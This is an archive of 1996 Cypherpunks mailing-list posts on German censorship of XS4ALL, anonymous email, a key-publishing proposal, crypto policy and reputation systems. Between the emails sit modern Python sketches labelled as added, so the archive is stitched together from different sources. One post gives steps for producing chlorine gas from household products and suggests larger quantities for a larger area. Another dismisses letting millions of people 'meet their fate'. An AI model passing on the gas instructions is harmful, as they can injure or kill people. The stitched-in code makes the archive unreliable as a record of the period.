XS4ALL internet. 
Forwarded message: > From felipe at xs1.xs4all.nl Sat Sep 14 22:34:56 1996 > From: Felipe Rodriquez > Message-Id: <199609142034.WAA29923 at xs1.xs4all.nl> > X-Length: 00001286 > Subject: I could get arrested by German authorities (German censorship) > To: declan at well.com, hkunzru at wired.co.uk > Date: Sat, 14 Sep 1996 22:34:52 +0200 (MET DST) > Cc: barlow at eff.com, lr at wired.com, rena at bionic.zer.de, > geert at xs4all.nl (Geert Lovink), patrice at xs4all.nl (Patrice Riemens), > boom at xs4all.nl (Marianne van den Boomen), > fvjole at xs4all.nl (Francisco van Jole) > X-Mailer: ELM [version 2.4 PL25] > MIME-Version: 1.0 > Content-Type: text/plain; charset=US-ASCII > Content-Transfer-Encoding: 7bit > > Hi, > > I got a message from Lorenz Lorenz-Meyer, Editor DER SPIEGEL online. He > spoke to the German Authorities and got some shocking news. > It seems that there is a possibility that I, as CEO of Dutch > internetprovider Xs4all, could get arrested by German authorities. > > This seems a bit far-off, but he is not the only person that > warned me about this possibility. People in the left-wing movement > in Holland have informed me about the aggressive behaviour of the > German government against the Radikal publications. Subscribers > have been violently arrested in the past. It was also predicted > by them that the German Authorities would not easily stop their > censorship of radikal. There seems to be a lot of old pain. > > Contemplating a bit further about the risk of being arrested, > I thought about these developments on a larger scale. The first > thing that popped to mind is that all the owners of the Radikal > mirror-sites may also be arrested if they ever visit Germany. These > are over 30 people and organisations. One of the sites Radikal was > mirrored on is EFF. The Board-members of EFF could, in theory, > be held responsible by the German Authorities. 
John Perry Barlow > could be arrested next time he comes to give a lecture in a > German city, because the EFF has illegal German documents on > its website. Declan McCullagh has put the Radikal information > in the Well. He and the managers of the Well might be questioned > when they enter Germany. Et cetera. It would be an outrage if > anything like this happens, but friends and this journalist told me > that it could happen to me anytime I travel to Germany. > > I'm tempted to disconnect the Radikal pages from Xs4all, because > of this intense intimidation. But if Xs4all would bend to this kind > of intimidation, we would create a precedent. The Germans might see it as > a 'reward' for their acts. They'd be stimulated to continue on this > road, and may become an example for other countries. > Imagine if every country would have these standards. Any country can > order their own ISP's to block a certain foreign site. Imagine the > authorities of those countries have the powers to prosecute against > foreign ISP's when they visit their country, or when they are extradited. > These acts of aggression against ISP's and internetusers will profoundly > change the Internet if they'd be tolerated. > > The possibility of being arrested in our neighbour country is almost > too surreal to think about. But now people start telling me to seriously > prepare for it, in case it may happen. It would not be the first time > a foreign citizen was arrested and put in jail by the Germans for > disseminating information. Just a couple of weeks ago a US citizen > was arrested by the Germans because he sent nazi documentation to > Germany through the mail, I think his name was Koch, but I'm not > sure. > > > Here is the message lorenz sent me: > > Date: Sat, 14 Sep 1996 13:13:52 +0200 > To: felipe at xs4all.nl > From: Lorenz Lorenz-Meyer > Subject: third attempt > > Hi Felipe, > > I just had an extensive and controversial talk > via phone with Mr. 
Hannich, spokesman of the german > Generalbundesanwalt, about the legal action taken > against the distributors of "radikal". As is the > nature of talks with official spokespersons it was > not utterly satisfying. But anyway. Just one question: > > The possible targets of german public > prosecution are not only german ISPs. > There are 'preliminary proceedings' of the > Bundesanwaltschaft against 'unknown' - i.e. > the persons responsible for making > "radikal" accessible in Germany over > the Internet, _even if they are in foreign > countries_. I'm afraid that this already includes > you. Have you been notified of this fact? > And do you have plans to guard/defend yourself? > > Regards, > > Lorenz. > > > > From paul at fatmans.demon.co.uk Sun Sep 15 13:18:19 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 16 Sep 1996 04:18:19 +0800 Subject: Fed appellate judge remarks re anonymity, free speech o Message-ID: <842781745.23335.0@fatmans.demon.co.uk> > >The article quotes Kozinski as saying "I have a severe problem with > >anonymous E-mailers . . . You don't have a right to walk up to somebody's > >door and knock with a bag over your head." The article says Kozinski likened > >anonymous E-mail to menacing someone. What is the offense involved then, going bagged in a public place? since when do I or anyone else not have the right to wear a bag on my head? 
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From hallam at ai.mit.edu Sun Sep 15 15:19:49 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Mon, 16 Sep 1996 06:19:49 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <51foeg$5ea@life.ai.mit.edu> Message-ID: <323C563B.4A7B@ai.mit.edu> Steven Weller wrote: > > >Perry E. Metzger wrote: > >> > >> Yes, we could be a workers paradise like one of those lovely European > >> countries with double digit unemployment and all. Too bad we didn't go > >> in for democratic socialism while we could have, eh? > > > >Perry, hate to burst your bubble but unemployment in the UK _tripled_ > >in the first eighteen months of rule by that great socialist Margret > ^^^^^^^^^ > >Thatcher. One third of UK manufacturing industry went bankrupt in the > >only large scale application of Freedman's ideas. > I think she was a little bit Tory. 
Conservative, maybe? Right wing? Funded > by industry? On kissing terms with Reagan? Socialist, no. Or was this an > attempt by Doctor Sarcasm at wit? It's difficult to know what the US definition of "socialism" is. Particularly on Cypherpunks. I would consider it reasonable to call Thatcher a statist and authoritarian which many on the list consider to be the definition of socialism. > Actually the UK is now way ahead of the rest of Europe in terms of > deregulation, low labor costs, efficient manufacturing, etc. Germany and > France are now up the familiar creek because of their too-socialist > policies. But there are those who say that Thatcher's slash and burn > approach was appalling. I would prefer to have the economic figures for any European country over those of the UK. At the start of the Conservative rule the UK was the second biggest economy. Today we have just been overtaken by Spain. Italy and France overtook long ago. With the exception of the UK the politics in Europe are much more left wing than those of the states. Excluding Major there is no European head of government to the right of Clinton. It's not really a case of "too socialist" as the natural rotation of power amongst the parties. Phill From camcc at abraxis.com Sun Sep 15 15:35:33 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Mon, 16 Sep 1996 06:35:33 +0800 Subject: (fwd)Atlanta NRC Cryptography Briefing Message-ID: <2.2.32.19960915191513.0068f0b0@smtp1.abraxis.com> >X-Sender: splatter at pop.io.com >Date: Sat, 14 Sep 1996 22:36:19 -0400 >To: 2600 at ninja.techwood.org, efg-action at ninja.techwood.org >From: myron.cramer at gtri.gatech.edu (Myron L. Cramer) (by way of * ) >Subject: [EFG] BoS: c4i-pro Atlanta NRC Cryptography Briefing >Sender: owner-efg-action at ninja.techwood.org >Reply-To: efg-action at ninja.techwood.org > >myron.cramer at gtri.gatech.edu (Myron L. Cramer) > > I am hosting a presentation by Dr. 
Herb Lin of the prestigious National >Research Council (National Academy of Science). He is the director of >their recent study on Cryptography. > > Cryptography is the key technology that underlies anything being done to >secure the internet or to make electronic commerce a reality. Policies >controlling the use of modern cryptographic technologies will determine the >future feasibility of the internet for business both in the near and far >terms. > > National cryptography policies also significantly impact on the >capabilities of the intelligence and law enforcement communities. > > Feel free to forward the following notice to anyone you think would be >interested in attending. > > Thank you. > > Myron Cramer > >------------------------------------------------------------------------ > Presentation > October 21, 1996 > > "Cryptography's Role in Securing the Information Society" > > Dr. Herb Lin > National Research Council > > >Cryptography, the work of creating and deciphering coded information using >mathematical formulas, long has been the sphere of spies and the military. >But in the past 10 years private-sector use of cryptography has exploded as >a result of advances in electronic communications and information >technologies. Decisions about national cryptography policy now have >important implications not only for national security, but also for U.S. >economic competitiveness, law enforcement interests, and the protection of >the privacy and other rights of individuals. The Computer Science and >Telecommunications Board of the National Research Council recently >completed a congressionally mandated study to examine the issues and >conflicting interests involved in cryptography and made recommendations on >national policy in this highly controversial area. > >There will be a public briefing in Atlanta, Georgia by the National >Research Council on this report. 
The briefing will be held at the >Manufacturing Research Center on the campus of the Georgia Institute of >Technology on Monday October 21, from 1:30 to 3:30. Dr. Herbert Lin, >director of the NRC study will conduct the briefing. Questions from the >audience will be entertained. > >For further information, please contact Dr. Myron L. Cramer (404) 894-7292, > at the Georgia Tech Research Institute. > >The event is open to the press and the public. > >Directions: From I-75/85 exit on Tenth Street and head West. Turn left on >Hemphill Street and follow it to where it ends on Ferst Street. The >Manufacturing Research Center is the modern building in front of you. >Parking is limited; use public transportation or allow yourself extra time. > >This meeting is hosted by the Georgia Tech Research Institute and the >College of Computing. > >__________________________________________________________________________ >Dr. Myron L. Cramer, Principal Research Scientist >Georgia Tech Research Institute (GTRI) | Voice: (404) 894-7292 >400 10th St, Room 554B | FAX : (404) 894-8636 >Atlanta, Georgia 30332-0840 | myron.cramer at gtri.gatech.edu >__________________________________________________________________________ > > > > > From geoff1 at home.net Sun Sep 15 15:52:18 1996 From: geoff1 at home.net (Geoff Dale) Date: Mon, 16 Sep 1996 06:52:18 +0800 Subject: (Long) RFC: Public Key Finger: A preliminary proposal for a distributed key publishing system Message-ID: <199609151909.MAA10901@toad.com> -----BEGIN PGP SIGNED MESSAGE----- The original (html) document may be obtained at: http://www.fqa.com/geoff/pkf.htm - --------------------------------------------------------------------------- Version 0.2, Draft Public Key Finger (aka the People's Key Front) A preliminary proposal for a distributed key publishing system - --------------------------------------------------------------------------- Wouldn't it be nice if distributing your public key(s) was as easy as publishing your e-mail 
address? As a matter of fact, it would be nice if you didn't even have to do anything more than giving out your e-mail address. Keyfinger is a way to make this possible. Requirements: Simplicity Components must be easy to understand, use, integrate, set-up and maintain. Scalability The system must be designed to be distributed and scale to accommodate large users like Netcom and AOL. To this end keyfinger uses the convention of connecting to keys.host.domain.com, allowing the administrator to use various methods to handle request traffic. Flexibility The system should be designed to allow interim solutions and phased deployment. Because of the fact that this system will not be deployed all at once, interim methods will be designed into the protocol. Security Ideally the fetching of keys should be across secure links, signed by the key-server, to avoid man-in-the-middle attacks. The individual keys should be self-certifying if signed by a known trusted entity (such as the ISP). Protocol: Client opens a socket connection to host (keys.host.domain.com or host.domain.com or domain.com) on designated port (a default port should be determined). Sends and inquiry string (user at host.domain.com) then the Host returns the contents of the .keyplan file. If the connection fails, the client may try to connect using http with a URL of form (http://host.domain.com/~user/.keyplan). Other supported methods may be finger and DNS lookup. Components: keyfinger Program for fetching the key. E-mail programs could incorporate this to allow automated key lookups within the mail authoring and authorization process. Various search engines could use this to allow key searches. Usage: keyfinger user[@host][.domain.com][@keyserver.domain.com][:port] ex: keyfinger geoff1 at home.net Host and domain are resolved in the standard manner, a default port is tbd. The optional usage is to add an actual keyserver which could be used for a more traditional key-server system. 
keyfingerd Program (daemon) run on isp's key server. Would automatically serve up .keyplan files from user's home directories. Some versions may access a local key database instead. 'Nym servers and e-mail gateways would require this kind of service. The keyfinger server would be responsible for keeping the keyplan entries up to date. keyfinger-proxy Program (daemon) running on firewall to allow keyfinger to run through firewalls. Allows keyfinger-ing of foreign systems from within the firewall, but not the reverse. key-setup Program that provides a gui interface to aid in the account setup. Should be able to work with .keyplan files and key databases. Authentication required to change key info required. .keyplan File in the user's home directory that contains the key information. User's on ISP's that don't provide keyfinger service could publish their .keyplan files in the top level of their web directory (/~/public_html or whatever). The contents would be a multipart mime document containing available keys with key-type (and size) information, perhaps in preference order. Allowable mime parts would also include key-revocation certificates. Note: It is a question as to how strictly these allowable types should be enforced. To allow extension of new key types enforce mime-type: key/... but not subtype (eg - key/pgp ). content-handler Java content-handler for dealing with .keyplan files. Actually a content handler could be written for each key mime-type. The java code could actually use http to do retrieval. protocol-handler Java protocol-handler for dealing with "keyfinger:" URLs. This would essentially be an implementation of the keyfinger component. Usage: keyfinger:user[@host][.domain.com][:port] Action Items In no particular order: * IETF Format Draft * Write reference code * Need port designation * Need mime-types for keys and the .keyplan file. Important Dates * 96-09-07 First Publication to the Coderpunks list. 
  * 96-09-14 Presented to SF Bay Cypherpunks Physical Meeting.

- ---------------------------------------------------------------------------
Page Maintained by Geoff Dale
Last Modified: September 15, 1996

_____________________________________________
Geoff Dale - geoff1 at home.net
Paraphrasing Larry Niven:
- -- Just think of it as economics in action --

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjxVrv1Xc5SjvRJ5AQEUoAQAnU193QKDiV5wW+Iv+ozfZfEH7cyi/cz3
LqduEO3BGkmW4Xfz/bXCwIwwSph1LEcePt6v0Wv+QUGOTXR/CZqjtxTzr3uCTHvP
0Zd76ZlfLD+JI3NSFniXsAXEeGeYLnQJqSHAa9cGUCYPh3/pgwfBuwNC+ZTgYkJo
ghLkuxHXrLE=
=4icU
-----END PGP SIGNATURE-----

From gbroiles at netbox.com Sun Sep 15 16:28:42 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Mon, 16 Sep 1996 07:28:42 +0800
Subject: HipCrime as MetaSPAM
Message-ID: <2.2.32.19960915193346.00697e78@pop.ricochet.net>

At 02:10 AM 9/15/96 -0700, Bill Stewart wrote:

>Just a Hippie Of Crime, not a Hippie Of Clue.

Indeed. He's also collecting user data for spams or trojan horse attacks in the future; a disassembly of his VisitorID.class and StealStuff.class files reveals that he's collecting (via Java) data about a user's IP address, email address, operating system, machine class (e.g., processor type), and collecting some filesystem info; the filesystem info collector seems to be prepared to cope with Macs, Windows boxes, and Unix systems. The user data is sent back both as an E-mail message and via HTTP to his home system. As far as I can tell, Netscape 3.0 on Win95 won't let it get any file system info but will let it detect IP addr, processor, and OS.

He's also got at least one mostly harmless but annoying JavaScript trick where he opens far too many copies of Netscape; I clobbered it after 9 or 10 windows had opened. (the windows claim to be "formatting your hard disk".)

As far as I can tell, he thinks that because some artists have a cynical, grouchy attitude, anything he does while affecting such an attitude is art.
What he's lost track of is that some artists are also assholes, and some people are simply juvenile assholes (no art).

--
Greg Broiles                | "We pretend to be their friends,
gbroiles at netbox.com      | but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |

From jimbell at pacifier.com Sun Sep 15 17:40:43 1996
From: jimbell at pacifier.com (jim bell)
Date: Mon, 16 Sep 1996 08:40:43 +0800
Subject: 56 kbps modems
Message-ID: <199609152017.NAA12491@mail.pacifier.com>

At 01:31 AM 9/15/96 -0700, Bill Stewart wrote:

>Unless they're _really_ talking about ISDN "modems", I'm surprised
>to hear somebody saying they can take 56 kbps, turn it into analog,
>let the phone company quantize and mu-law the analog into 64kbps,
>and still get the original 56kbps back out. But if they can, well,
>yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is
>still useful for some applications, the convenience of two channels on
>one wire pair is nice, and the fact that people can get 56kbps without
>the phone company's help will pressure them into offering ISDN for
>a lower price in areas where the Phone Company's idea of "all the market
>will bear" is substantially higher than voice pricing.)

If the phoneco was realistic about ISDN value, they'd decide that since anybody can buy a 31k modem for $100 or so, the "value" of a 128K connection is about $400, and then they'd charge based on the actuarial value of this hypothetical one-time fee, at perhaps an interest rate of 5% or so: In other words, about a $20 per year charge, or around $2 per month.

Jim Bell
jimbell at pacifier.com

From tcmay at got.net Sun Sep 15 17:49:23 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 16 Sep 1996 08:49:23 +0800
Subject: Workers Paradise. /Political rant.
Message-ID:

At 7:08 PM 9/14/96, Asgaard wrote:

>The problem with the 100% market economy approach is what to do
>with those who just can't get it together, i.e. who buy beer for the
>money that should go to health insurance and then fall ill. It's
>against basic human instincts to just let them stay in agony.

I have no problem with letting them stay in agony (but you all knew this).

"Saving for a rainy day," whether saving, investing, getting an education (while others are out partying), preparing, etc., all takes effort and commitment. If those who save and prepare are then told they have to pay high taxes to support those who partied....well, the predictable effect is that many of them will say "I'll just party and let The System take care of me." Thus, the effect of "not letting them stay in agony" is _more_ people in agony. When you tell people that a compassionate society will meet their basic needs, a predictable fraction of them will choose not to work hard and prepare themselves.

I say we need to let about 20 million Americans, and a couple of billion in the rest of the world, meet their fate.

While I will not _actively_ seek to dispose of them, I will work to make sure they cannot continue to subsidize their lives at my expense.

Crypto Anarchy means getting rid of deadwood the old-fashioned way.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
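
The client side of the keyfinger proposal posted earlier in this archive (the lookup order and the `.keyplan` type check), as an added sketch; it is not Geoff Dale's reference code, which the proposal lists as still to be written. The function names, the user and host name validation, the size cap, the requirement that a host be given, and the constructed sample document are assumptions, and the port stays unassigned because the proposal has none.

```python
import re
from email import message_from_string

DEFAULT_PORT = None          # assumption: the proposal leaves the port "tbd"
MAX_KEYPLAN_BYTES = 64 * 1024  # assumption: cap on what a client will parse

# Assumed hardening: the inquiry string ends up selecting a file in a home
# directory on the server, so refuse anything that is not a plain account name.
_USER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,}$")


def parse_target(spec):
    """Split 'user@host[@keyserver][:port]' into validated pieces."""
    port = DEFAULT_PORT
    if ":" in spec:
        spec, _, port_text = spec.rpartition(":")
        if not port_text.isdigit() or not 0 < int(port_text) < 65536:
            raise ValueError("bad port")
        port = int(port_text)
    parts = spec.split("@")
    if len(parts) not in (2, 3):
        raise ValueError("expected user@host or user@host@keyserver")
    user, host = parts[0], parts[1].lower()
    keyserver = parts[2].lower() if len(parts) == 3 else None
    if not _USER_RE.match(user):
        raise ValueError("bad user name")
    for name in filter(None, (host, keyserver)):
        if not _HOST_RE.match(name):
            raise ValueError("bad host name")
    return user, host, keyserver, port


def lookup_plan(spec):
    """Ordered (method, target, port) attempts, following the Protocol section."""
    user, host, keyserver, port = parse_target(spec)
    if keyserver:                      # explicit "traditional" key server
        return [("keyfinger", keyserver, port)]
    steps = [("keyfinger", "keys." + host, port), ("keyfinger", host, port)]
    labels = host.split(".")
    if len(labels) > 2:
        # Naive parent-domain step; it knows nothing about registry suffixes
        # such as co.uk, so a real client needs a stricter rule here.
        steps.append(("keyfinger", ".".join(labels[1:]), port))
    steps.append(("http", "http://%s/~%s/.keyplan" % (host, user), 80))
    return steps


def parse_keyplan(text):
    """Return (accepted, rejected): key/* parts in document order, other types."""
    if len(text.encode("utf-8", "replace")) > MAX_KEYPLAN_BYTES:
        raise ValueError(".keyplan too large")
    msg = message_from_string(text)
    if not msg.is_multipart():
        raise ValueError(".keyplan must be a multipart MIME document")
    accepted, rejected = [], []
    for part in msg.get_payload():
        ctype = part.get_content_type()
        # Enforce the main type "key" but not the subtype, as the note on
        # .keyplan suggests, so unknown future key types still pass.
        if part.get_content_maintype() == "key" and not part.is_multipart():
            accepted.append((ctype, part.get_payload().strip()))
        else:
            rejected.append(ctype)
    return accepted, rejected


# Constructed sample document; the key bodies are placeholders, not real keys.
SAMPLE_KEYPLAN = (
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="kp"\n'
    "\n"
    "--kp\n"
    "Content-Type: key/pgp\n"
    "\n"
    "CONSTRUCTED-PGP-KEY-PLACEHOLDER\n"
    "--kp\n"
    "Content-Type: text/html\n"
    "\n"
    "<b>not a key</b>\n"
    "--kp\n"
    "Content-Type: key/x-example-future\n"
    "\n"
    "CONSTRUCTED-FUTURE-KEY-PLACEHOLDER\n"
    "--kp--\n"
)

if __name__ == "__main__":
    for step in lookup_plan("geoff1@home.net"):
        print(step)
    print(parse_keyplan(SAMPLE_KEYPLAN))
```

Nothing here checks a signature, so the Security requirement (keys signed by the key server or another trusted entity) still has to be met before a fetched key is used.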

From jlv at signet.sig.bsh.com Sun Sep 15 18:09:12 1996
From: jlv at signet.sig.bsh.com (Jason Vagner)
Date: Mon, 16 Sep 1996 09:09:12 +0800
Subject: Internet Drivers' Licenses
In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com>
Message-ID:

On Fri, 13 Sep 1996, Mike Duvos wrote:

> I am now getting more junk email than email from people I
> care to correspond with. It seems one can't even read the
> scholarly newsgroups anymore without "Come Watch Us Lick
> Ourselves on the Web" messages popping up regularly.

Not only that, but the newsgroups have all gone to hell with commercial ads.

jlv

From gnu at toad.com Sun Sep 15 18:41:06 1996
From: gnu at toad.com (John Gilmore)
Date: Mon, 16 Sep 1996 09:41:06 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <199609062315.QAA24170@comsec.com>
Message-ID: <199609152201.PAA14578@toad.com>

> Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl
> to ensure that its 3100 userpages will all remain available for any
> internet-user.

While you are at it, you could move just the censored material to a separate IP address from the rest of the archives, and issue Web redirects for requests sent to the old address.

In fact it might be interesting to redirect readers to various mirror sites automatically, at random and in rotation. Thus, when someone connects to your web site to read censored material, they will be automatically redirected to one of dozens or hundreds of other places where the material can be found. The German censors will likely find it impossible to block access to all those sites (and each such site can also be changing its IP address periodically).

It's my impression that the draft Mobile-IP protocols will make it possible for a site to use IP addresses from all over the Internet.
Mobile IP is normally designed for permitting a physical host to move to various physical locations while retaining a fixed logical IP address (corresponding to its "home" location). It can probably also be used to permit a physical host at a single physical location to respond to multiple logical IP addresses at multiple virtual "home" locations. See http://www.ietf.org/html-charters/mobileip-charter.html, or search for "Mobile IP" in a web search engine.

The Mobile IP protocols require strong authentication in order to "move" around the network securely. We hope this will prevent them from being used to subvert Internet hosts. However, in the presence of *cooperation* from a variety of Internet sites, they can also be used to make the physical location and Internet-address of actual stored information invisible to the requesters of that information -- and to the censors attempting to block access to it.

Curiously enough, the National University of Singapore has implemented Mobile IP for Linux! See http://zaphod.ee.nus.sg/mip/. Even in the backyards of the most egregious censors, freely available technology for combatting censorship is being built and distributed. (A second Linux implementation from http://anchor.cs.binghamton.edu/~mobileip/ is also available.)

	John Gilmore

From adam at homeport.org Sun Sep 15 18:53:16 1996
From: adam at homeport.org (Adam Shostack)
Date: Mon, 16 Sep 1996 09:53:16 +0800
Subject: Reputation in action
In-Reply-To: <7654f2dw3r@netcom.com>
Message-ID: <199609152246.RAA17894@homeport.org>

Greg Burk wrote:
| Well, this looks like a chance to quickly correct some mistakes without
| spending a lot of time framing the issue.
|
| tcmay at got.net (Timothy C. May) writes:
| > But this latest episode illustrates the role of reputations. Namely, my own
| > reputation is not being harmed by bizarre commentaries from the Vulis-bot.
| And it seems to me that your usage of "reputation" has at different
| times meant both direct and indirect exposure. This clearly discards
| important information, often to the detriment of your analysis. Perhaps
| you can explain why the two separate things are the same in some
| important way, aside from merely that they both involve esteem.

A while back (Sept 94) I sketched out a system for using a numeric indicator (from -1 through 1) as an indicator of how interested (likely to read) you were in someone else's postings. I suggested that simple multiplication could achieve useful results. If I respect Alice 50% of the time, and Alice respects Bob 50% of the time, then a rough cut at my interest level in Bob would be 25%. If Alice disrespects Charles 90% of the time, that gives him a negative 45% in my book.

By generating simple numbers like this, I can tune my tolerance level based on time. It's not perfect, but roughly works. Deranged Mutant pointed out that radically different opinions by a few people might cause the system to start behaving chaotically, and Hal also had some interesting comments. Check the archives.

| > In the mathematics of reputations, a negative reputation held by one whose
| > own reputation is negative is a positive.
|
| I don't think this is an example of any such thing. I would not respect
| a person even a tiny bit more just because a kook disrespects them. In
| fact, since the kooks frequently hold each other in very low esteem, the
| suggested polarity-math is self-contradictory.
|
| Rather, I think this is an example of how direct exposure supersedes
| reputation.

Kooks do mess things up a bit; but most people aren't kooks. My enemy's enemy is my friend is oft true.

In the system I outlined, direct exposure clearly does supersede reputation, except in the (possibly rare) case where you respect someone else more than you respect yourself.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
					       -Hume

From jf_avon at citenet.net Sun Sep 15 18:53:24 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Mon, 16 Sep 1996 09:53:24 +0800
Subject: Fed appellate judge remarks re anonymity, free speech o
Message-ID: <9609152200.AA06978@cti02.citenet.net>

On 14 Sep 96 at 20:14, paul at fatmans.demon.co.uk wrote:

> >The article quotes Kozinski as saying "I have a severe problem with
> >anonymous E-mailers . . . You don't have a right to walk up to
> >somebody's door and knock with a bag over your head." The article
> >says Kozinski likened anonymous E-mail to menacing someone.

> What is the offense involved then, going bagged in a public place?
> since when do I or anyone else not have the right to wear a bag on
> my head?

Make-up should be outlawed! The potential for turning oneself into an anonymous creature is *way* too big for not being alarming. There ought to be a law!

And besides, although it is often used as an enhancing tool, of what use is the little and irrelevant egoist human pleasure of looking "nice" when we are viewing things from the standpoint of a sensitive and poor and terrified child or frail and defenseless woman?

jfa
Jean-Francois Avon, Montreal QC Canada
"One of these centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From shamrock at netcom.com Sun Sep 15 19:08:35 1996
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 16 Sep 1996 10:08:35 +0800
Subject: [Noise] Shopkeepers Preventing Riot Redistribution
In-Reply-To: <199609151328.JAA16180@osceola.gate.net>
Message-ID:

On Sun, 15 Sep 1996, Jim Ray wrote:

> Indeed, it was. In a beautiful-to-me scene which Miami's WSVN, Channel 7
> (our big-hair station) called "chilling," Korean-American shopkeepers,
> perched atop their building with semi-automatic firearms, kept one block
> safe while the rest of the neighborhood burned without police protection.
> Upon being informed that this was a biased interpretation of legitimate
> actions by the merchants, which _I_ found heartwarming, they said that
> chilling was "just a word."

What your TV station probably didn't report was that the police quickly showed up at the scene. To arrest the looters carrying crowbars and torches? Of course not. The cops came to arrest the "sniper".

--Lucky

From snow at smoke.suba.com Sun Sep 15 19:23:07 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 10:23:07 +0800
Subject: That Evil Internet, Pt. XXIII
In-Reply-To: <199609120410.VAA11385@web.azstarnet.com>
Message-ID:

On Wed, 11 Sep 1996, David M. Rose wrote:

> Caught an interesting segment on this evening's PBS news program with Jim
> Lehrer.
> Two senators were discussing whether the U.S. should sign the international
> agreement banning chemical warfare.
> Sen. Kyl maintains that verification is impossible and that Iraq, Libya, and
> North Korea will never participate.
> Sen. Nunn responds that we should sign anyway.
Besides, he adds in the non > sequitur of the week, anyone can get instructions on how to build chemical > weapons on the Internet. > I guess the Internet isn't just for pornography and conventional bomb-making > advice anymore. WARNING: DANGEROUS. Simple advice for the manufacture of Chlorine Gas (similar enough to mustard gas that it has the same effect). 1 bottle of Chlorine Bleach. 1 Bottle of lime-away. Hold Breath, mix in open container. Clear the building before you breathe again. Use more bottles for a larger area. I did this accidentally when I was young (16), foolish and working for a hospital. That it happened at work (_very_ small amounts of both bleach and lime-away) made the Emergency Room visit free and quick. No permanent damage, but I was lucky. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From dwatson at deltanet.com Sun Sep 15 19:28:11 1996 From: dwatson at deltanet.com (Dave Watson) Date: Mon, 16 Sep 1996 10:28:11 +0800 Subject: Crypto Publicity Message-ID: <199609152245.PAA24552@mail1.deltanet.com> The Orange County Register, a somewhat conservative daily for the county just south of somewhat more liberal Los Angeles, provided a short plug for crypto in today's editorial page. Not that they're necessarily any better than the others, but positive publicity should be encouraged. "The Clinton administration has been trying to control cryptography completely. It doesn't care that its export controls on cryptography put U.S. companies at a disadvantage, unable to secure properly exports of electronic information. A new group has formed to fight against this censorship: the Internet Privacy Coalition. Concerned businesses and private citizens should check out its web site at: www.privacy.org/ipc/" The register is at www.ocregister.com. 
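
The multiplication scheme from Adam Shostack's "Reputation in action" message above, as an added sketch that is not his code. The hop limit, the rule of keeping the strongest chain when several reach the same person, and the `follow_negative` switch (which lets a reader take either side of the "enemy's enemy" disagreement with Greg Burk) are assumptions; the sample ratings are constructed, apart from the Alice, Bob and Charles figures taken from the message.

```python
def derived_interest(ratings, me, target, max_hops=3, follow_negative=True):
    """Interest in `target` on the -1..1 scale; 0.0 means no information.

    ratings maps rater -> {ratee: score}. Scores along a chain of raters
    are multiplied, as in the message's Alice/Bob/Charles arithmetic.
    """
    mine = ratings.get(me, {})
    if target in mine:
        # Direct exposure supersedes anything derived from other raters.
        return mine[target]

    best = 0.0
    # Each stack entry: (rater, product of scores so far, raters on this chain).
    stack = [(me, 1.0, frozenset([me]))]
    while stack:
        rater, weight, seen = stack.pop()
        if len(seen) > max_hops:
            continue  # chain already has max_hops raters; do not extend it
        for ratee, score in ratings.get(rater, {}).items():
            if not -1.0 <= score <= 1.0:
                raise ValueError("score out of range for %s -> %s" % (rater, ratee))
            if ratee in seen:
                continue  # never loop back; keeps mutual ratings from feeding themselves
            product = weight * score
            if ratee == target:
                if abs(product) > abs(best):
                    best = product  # assumption: the strongest chain wins
            elif rater != me and ratee in mine:
                continue  # I rate this person myself; ignore others' view of them
            elif product > 0 or follow_negative:
                # With follow_negative=False, the opinions of people I hold
                # in low esteem are discarded instead of being sign-flipped.
                stack.append((ratee, product, seen | {ratee}))
    return best


# Constructed sample: "kook" and "dave" are illustrative names.
SAMPLE_RATINGS = {
    "me": {"alice": 0.5, "kook": -0.8},
    "alice": {"bob": 0.5, "charles": -0.9, "me": 1.0},
    "kook": {"dave": -0.9, "alice": -1.0},
}

if __name__ == "__main__":
    for name in ("alice", "bob", "charles", "dave"):
        print(name, derived_interest(SAMPLE_RATINGS, "me", name))
    print("dave, ignoring kooks:",
          derived_interest(SAMPLE_RATINGS, "me", "dave", follow_negative=False))
```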

From jyy at gnn.com Sun Sep 15 19:51:29 1996
From: jyy at gnn.com (John Young)
Date: Mon, 16 Sep 1996 10:51:29 +0800
Subject: Pipeline Down
Message-ID: <199609152328.TAA01262@mail-e2b-service.gnn.com>

Pipeline appears to be down. Maybe a SYN sin, maybe just a Sunday sin.

If any unanswered messages to jya at pipeline.com, try jyy at gnn.com

From snow at smoke.suba.com Sun Sep 15 19:52:51 1996
From: snow at smoke.suba.com (snow)
